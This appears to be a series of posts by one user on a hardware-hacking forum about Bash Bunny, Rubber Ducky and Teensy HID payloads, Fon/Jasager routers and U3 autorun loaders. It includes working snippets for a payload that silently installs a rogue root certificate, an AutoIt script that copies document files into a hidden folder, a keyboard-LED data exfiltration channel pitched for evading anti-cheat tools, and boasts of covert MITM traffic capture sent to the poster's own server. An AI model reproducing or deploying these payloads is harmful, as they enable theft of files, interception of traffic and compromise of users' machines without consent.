jrsmile

have reduced to only payload.txt but i cant get the escaping to work the payload just hits win+r and stops. QUACK STRING powershell Import-Certificate -CertStoreLocation cert:\CurrentUser\Root -FilePath ((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\root.cer') nevermind forgot the quotation marks after QUACK STRING .... new git version uploaded

Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.

indeet ... dammit there is always someone beeing faster and more elegant ;) anyway: here the binary converted PC part written in autoit (NOT compatible with the previous arduino code!): $arr = stringtobase2("Dies ist ein sehr sehr langer Test 0123456789") sendarray($arr, 40) ; 40 ms pause * 2 *8 = One Character every 640 ms ! Func sendarray($arr,$speed) For $i = 1 To UBound($arr) - 1 ConsoleWrite($arr[$i] & @CRLF) $arr2 = StringSplit($arr[$i], "") For $x = 1 To $arr2[0] If $arr2[$x] = 1 Then Send("{SCROLLLOCK on}") Else Send("{SCROLLLOCK off}") EndIf Send("{NUMLOCK on}") Sleep($speed) Send("{NUMLOCK off}") Sleep($speed) Next Send("{SCROLLLOCK off}") Next EndFunc ;==>sendarray Func stringtobase2($txt) Local $src = StringSplit($txt, "") Local $res[UBound($src)] For $x = 1 To $src[0] $res[$x] = chartobase2($src[$x]) Next Return $res EndFunc ;==>stringtobase2 Func chartobase2($chr) Local $nr = Asc($chr) Local $res = "" If BitAND($nr, 128) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 64) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 32) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 16) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 8) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 4) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 2) Then $res &= "1" Else $res &= "0" EndIf If BitAND($nr, 1) Then $res &= "1" Else $res &= "0" EndIf Return $res EndFunc ;==>chartobase2

Hey, im one of the two main developers, if you heed help with the code feel free to ask.

Hi there, i have thought about the solution transferring data via the keyboard leds back to the teensy. first of all its a proove of concept. (so pritty slow) what you need. arduino ide teensydurino addon from pjrc.com #include <phukdlib.h> from irongeek.com and for the sending part: autoit from autoitscript.com arduino code: #include &lt;phukdlib.h&gt; int ascii = 0; char buf[12]; int changed = 0; void setup() { pinMode(6, OUTPUT); } void loop() { if (IsNumbOn()){ if (IsScrlOn()){ // digitalWrite(6, HIGH); changed = 1; } else { if (changed == 1){ changed = 0; ascii += 1; } // digitalWrite(6,LOW); } } else { if (ascii &gt; 0){ char thisString = ascii; Keyboard.print(thisString); ascii = 0; } } } and the counterpart on the pc itself, written in autoit. Global $speed = 36 ; lesser values for faster transfer, may result in false data... sendstring("test") Func sendstring($string) Send("{SCROLLLOCK off}") Send("{NUMLOCK off}") $src = StringSplit($string, "") For $i = 1 To $src[0] ConsoleWrite($src[$i] &amp; @CRLF) sendkey($src[$i]) Next EndFunc ;==&gt;sendstring Func sendkey($key) Send("{NUMLOCK on}") For $x = 1 To Asc($key) Send("{SCROLLLOCK on}") Sleep($speed) Send("{SCROLLLOCK off}") Sleep($speed) Next Send("{NUMLOCK off}") Sleep($speed) EndFunc ;==&gt;sendkey it uses numlock to activate listening mode and sends the string as ascii codes to the teensy via scrolllock, i took those Keys to be able to type normaly during the transfer process. i may switch to binary mode when i know more about arduinos capability to use it. maybe using num as clock and scrolllock as data line. what i figured out when lowering the send delay below 36ms between led iterations the arduino won't be able to keep up and misses some of the signal switches. currently i only check for the scrolllock turning of so maybe there is a performance boost hidden in it too. to see if the arduino has understood the signal correctly i managed to return the send keys as real keys back to the computer. now i have a hardware keyboard controlable by software on the same machine. good for anticheating tool workarounds (when it gets faster)... please make sure you select a keyboard enabled usb type in the arduino ide via "Tools" > "USB-Type" thats it for now, feel free to contribute or wait. ;)

Finally we have a working sample project for all teensy users which have an sd-card reader. http://www.renosite.com/

it is indeet possible to turn it into a flash drive, and the 24k fat32 partition it can handle internally would be enough for a passwords.txt, BUT its more then a mess if you want to switch easily between the two modes, fortunately you want read only support for the teensy and read write for windows but if both methods want to write to the file you will be in AVR hell. maybe Paul can help ;) *wink*

Hi there i started this thread to document my progress with the ducky and the sd-card reader addon... Step 1 : research the Interwebs... * http://en.wikipedia.org/wiki/SCSI_Inquiry_Command * http://elasticsheep.com/2010/04/teensy2-us...with-an-sd-card * http://cdemu.blogspot.com/ * http://renosite.com/ * http://fourwalledcubicle.com/LUFA.php Step2 : first aproach ;) got a working FIXED HDD-drive. Step3 (needs to be done): convert the HDD to a CD-ROM

im currently working on the cd-rom emulation its "slow" but working: what i have so far: dipswitch decides weather mass-storage mode or cd-rom emulation is activated. in mass-storage mode you can put an iso file into the _ISO folder on the sdcard, so the teensy works like a normal usb-stick. in cd-rom emulation mode (non dvd until now) it looks for the _ISO folder on the sd-card and mounts the first image as a bootable cd-rom drive. im currently trying to speed the teensy up but 16 MHz are way to less to get USB 2.0 High-Speed support. so currently its more like an 50x CD-ROM, due to the fact that there are no read delays (cd-rom seeking spinup/down) it feels like a 150x cd-rom. i want to preserve the HID-Keyboard support so i can change the bootorder in the bios with the teensy itself. ( mostly using HP notebooks in the company so same bios for all). btw. I like the Hairbrush thingie. best regards from germany, JR

Man with your post you made 750 Members of our Company extremly happy. Please feel free to feel yourself hugged 751 times.

theese are bad bad news :) but btw.: sd card support works and i tested it with masstorage/HID kombination. its perfect to have the executable and the keystrokes on the same stick to let your magic happen ;) http://elasticsheep.com/2010/04/teensy2-us...ith-an-sd-card/ for LUFA there is a masstorage / dataflash example which turns the teensy to a readonly 20kbyte usbstick with HID support. very good to deliver payloads if you have just the teensy.

Hi there, would it be possible to add a USB-CDROM feature for the teensy to mount iso files? so you can boot from the teensy?

i got my ducky Today (03.05.2010) shipped (22.04.2010) so the mail service between the us and germany works again, great :) ps.: thanks for the photo of the hak5 crew signed by Shannon ;)

One idea i had when it woud be possible to add micro-sd cards to the teensy was: add multiple sd cards add a dip switch or potentiometer for sd card selection compile some kind of bootloader for the ISOs on the sd-cards and boot right away from the isos. A usb stick that has all OS-Boot CDs on it i will ever need would be THAT thing for an IT-roadwarrior like me. regards, JR.

i love this thing, always thought about a way to automate stuff without having to add something to the machine im on, did it some time ago with the warrior chips if you can remember them. i would develop a password generator linked to the exact time of day to generate passwords that change every minute by scheduled tasks or something :) just have to keep the time on the thingy in sync. but at least a daily changing password algorythm would be easily possible. if i im not with the first 100 i will buy the teensy straight away :)

if you are just filtering the traffic you want and not a bunch of arp crap it wouldn't be to much gzipping it then pasting it to the net via dns tunnel... hmmm i love the world where with a bit it knowledge everything can be archived :)

Hardware MITM with no possebility to catch the attacker is great, already did this with a fritzbox (common low cost router here in germany) sending the traffic filtered and compressed via tcp to my root server :-) but the fon is live capturing and this is even more nicer. :-) great peace of work best regards, J.

100k views and no reply?, is my question so bad or was the word "whitehat hacking" so fearsome? :-)

indeet, but for testing purposes it is nice to have this up because you can change a batch script save it and instantly try out if it does the things it was supposed to be :-) when done, you have the possebility to move it to the u3 partition.

instead of figuring out the crazy iso stuff everytime you insert a custom app in the u3 partition of your stick i have created a multiloader which will search for a start.exe on the usb stick and executes it, so you only have to do the iso stuff the first time then use a start exe created by you to make the magic happen. the attached rar includes a autorun.inf the sourcecode of the exe the exe itself and a precreated iso which can be imported via the launchpad installed. launchU3.rar Best regards, J.

btw: the snapshot release of openwrt now works with the fon+ right out of the box even with the freifunk gui ;-)

Hi there, after "discovering" afew network issues of other computers with jasager i will now turn to whitehat hacking and turn the Fon into a mobile internet station. First i did install iphonemodem with zrelay to enable a socks5 server on the iphone, then connect to the fon via static ip ( unfortunately because iphone switches completely to wlan if it gets a dns+gateway, which i have removed in the static ip configuration) then created a script on the fon watching for the mac of the fon if port 1080 is open and a socks connection is possible (tsocks). then it triggers a script that will do the following, change the br-lan traffic from outgoing via eth0.1 (wan) to the socks client located on the fon which is connected to the iphone, and leaving directly to the internet. i theorie everything is aready working but i have a problem finding the correct software (tsocks,vtun,iptables-rules) to forward the traffic transparently for the clients connected via wlan or lan to the socks server of the iphone. tsocks itself already works so i can do an "tsocks opkg update" via the iphone to update the package archive on the fon :-) has anybody already experimented with this or knows a a software/configuration to create for example a virtual interface "socks0" to forward the traffic to? best regards, JRSmile ps: thanks digininja for the tip with gargoyle, it worked perfectly after i have removed all the custom stuff ;P

nevermind, i already test flashed one of my fons so i found it out myself :-) short question, i can install the following images: DD-WRT LEGENT (no eth0) orginal fon image this new fon image. but always when i want to install open-wrt it does not come further then ca 2 seconds after the boot_timeout phase. so the image is loaded then hangs. any ideas?

fast question, what will be installed when using this image :-) is this a unlocked version of the fonera firmware (ssh enabled) or a fully functional jasager image customized to work on fon+ ? and if it is the fonera firmware image, why should someone want to first nstall this the doo all the steps again to install openwrt when it can be installed whithout fonera firmare previously installed... im a bit confused now ;P please help me interpreting this post correctly :-)

somebody requested a slurping code in autoit? _CopyAll("doc") Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\") Local $search = FileFindFirstFile($where &amp; "\*.*"), $file If $search = -1 Then Return False EndIf While 1 $file = FileFindNextFile($search) If @error Then ExitLoop If StringRight($file, 4) = "." &amp; $type Then FileCopy($where &amp; "\" &amp; $file, $to, 9) If StringInStr(FileGetAttrib($where &amp; "\" &amp; $file), "D") Then Call("_CopyAll", $type, $where &amp; "\" &amp; $file) EndIf WEnd FileClose($search) EndFunc ;==&gt;_CopyAll